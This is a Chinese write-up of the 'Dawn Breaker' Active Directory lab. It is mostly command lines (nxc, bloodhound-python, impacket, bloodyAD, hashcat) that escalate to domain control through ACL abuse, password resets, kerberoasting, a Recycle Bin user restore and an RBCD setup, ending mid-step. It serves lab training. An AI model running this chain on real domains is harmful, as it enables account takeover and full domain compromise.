网络安全在线就能打的内网靶场推荐 Dawn Breaker 单域靶场 WP

信息收集SMB Welcome 可读nxc smb 192.168.111.10 -u -p --shares读取 Letter.txt 文件将这个信息作为用户名和密码进行尝试nxc smb 192.168.111.10 -u Yangyang -p Hello --shares使用 bloodhound-python 进行信息收集bloodhound-python -c All -u Yangyang -p Hello -ns 192.168.111.10 -d sec.lab -dc ad.sec.lab --zip --dns-tcp但是线路到了 LAHAYOSEC.LAB 就断开了接着再分析是否有路线到达域控或者域管理员看到有一个未知的节点可以RBCD到域控第二条线路经过分析发现 Rover 这个账户很特殊它关联着一个计算机账户SOLARISSEC.LAB 可以重置它的密码但是现在还没有 SOLARISSEC.LAB 相关的信息在目前这个情况下想要获取到 SOLARISSEC.LAB 有两个方法可以尝试Pre-Created Computer AccountTimeroasting获取 SOLARISSEC.LAB 的控制权发现 SOLARISSEC.LAB 其实是Pre-Created Computer Account利用之前的域账户就能获取到其 Kerberos 凭据另外Pre-Created Computer Account的密码与账户名全小写一样重置 SOLARISSEC.LAB 自身密码impacket-changepasswd -altuser SOLARIS$ -altpass solaris -newpass 123456 -reset sec.lab/SOLARIS$ad.sec.lab -k -dc-ip 192.168.111.10获取 Rover 域用户的控制权重置 Rover 的密码bloodyAD -u Solaris$ -p 123456 -d sec.lab --host 192.168.111.10 set password Rover 123456验证账户不成功根据报错来判断账户还没启用启用 Rover 账户bloodyAD -u Solaris$ -p 123456 -d sec.lab --host 192.168.111.10 remove uac Rover -f ACCOUNTDISABLEJinzhou 安全组AddSelfRover 用户是可以将自身加入 JinzhouSEC.LABbloodyAD -u Rover -p 123456 --host 192.168.111.10 -d sec.lab add groupMember Jinzhou RoverAddSPN根据ACL可以通过给图上四个用户添加servicePrincipalName来达到利用kerberoasting破解密码bloodyAD -u Rover -p 123456 -d sec.lab --host 192.168.111.10 set object Jinxi servicePrincipalName -v http/webnxc ldap 192.168.111.10 -u Rover -p 123456 --kerberoasting KERBEROASTINGhashcat KERBEROASTING /usr/share/wordlists/rockyou.txtBlack Shores 安全组AddMember根据 JINXISEC.LAB 的ACL将 Rover 加入 Black ShoresISEC.LABbloodyAD -u Jinxi -p Jinxin --host ad -d sec.lab add groupMember Black Shores RoverWriteOwner根据ACLBlack ShoresISEC.LAB 对 TheShorekeeper 有 WriteOwner 权限PSTheShorekeeper 用户是禁用状态可以使用 nxc 或者 查询 userAccountControl 属性来验证这里就略过了bloodyAD -u Rover -p 123456 --host ad -d sec.lab set owner TheShorekeeper Rover bloodyAD -u Rover -p 123456 --host ad -d sec.lab add genericAll TheShorekeeper Rover bloodyAD -u Rover -p 123456 --host ad -d sec.lab set password TheShorekeeper 123456 bloodyAD -u Rover -p 123456 -d sec.lab --host 192.168.111.10 remove uac TheShorekeeper -f ACCOUNTDISABLELahayo 安全组AddMemberbloodyAD -u TheShorekeeper -p 123456 -d sec.lab --host 192.168.111.10 add groupMember Lahayo Rover接下来就回到上面信息收集部分分析的路径到这里就断开了注意其实这个场景不止两条路径到达最后的域控下图这个节点到底是什么它可以 RBCD 到域控目前的路径无法获取下面的用户权限Active Directory - Recycle BinActive Directory 回收站是 Windows Server 的一项功能允许在不从备份还原的情况下完整恢复误删的 AD 对象。核心特性完整恢复恢复对象的所有属性如 SID、组权限、密码。生命周期已删除状态 (Deleted)对象移入回收站保留所有属性。已回收状态 (Recycled)超过“已删除对象生存期”后属性被剥离不可简单恢复。默认状态Windows Server 2008 R2 引入默认禁用需手动开启且不可逆。恢复方式图形界面通过AD 管理中心 (ADAC)的 Deleted Objects 容器。命令行使用 PowerShell 命令Restore-ADObject。查询是否有用户对 Deleted Objects 有权限bloodyAD -u Rover -p 123456 -d sec.lab --host 192.168.111.10 get writable还发现了一个删除状态的用户查询已删除用户的信息bloodyAD -u Rover -p 123456 -d sec.lab --host 192.168.111.10 get search -c 1.2.840.113556.1.4.2064 --filter (isDeletedTRUE) --attr name,objectSidLynae 用户的 objectSid 刚好对于上了未知节点的SID恢复已删除用户bloodyAD -u Rover -p 123456 -d sec.lab --host 192.168.111.10 set restore Lynae重置已删除用户的密码和启用用户bloodyAD -u Rover -p 123456 -d sec.lab --host 192.168.111.10 set password Lynae 123456 bloodyAD -u Rover -p 123456 -d sec.lab --host 192.168.111.10 remove uac Lynae -f ACCOUNTDISABLE注意如果出现该报错说明该用户对已删除对象不存在 LIST | READ 权限WP 中先把 Rover 用户加入了 Lahayo 安全组bloodhound 中没有实现对该 ACL 的分析需要自己手动分析RBCDbloodyAD -u Lynae -p 123456 -d sec.lab --host 192.168.111.10 add computer Web 123456 bloodyAD -u Lynae -p 123456 -d sec.lab --host 192.168.111.10 add rbcd AD$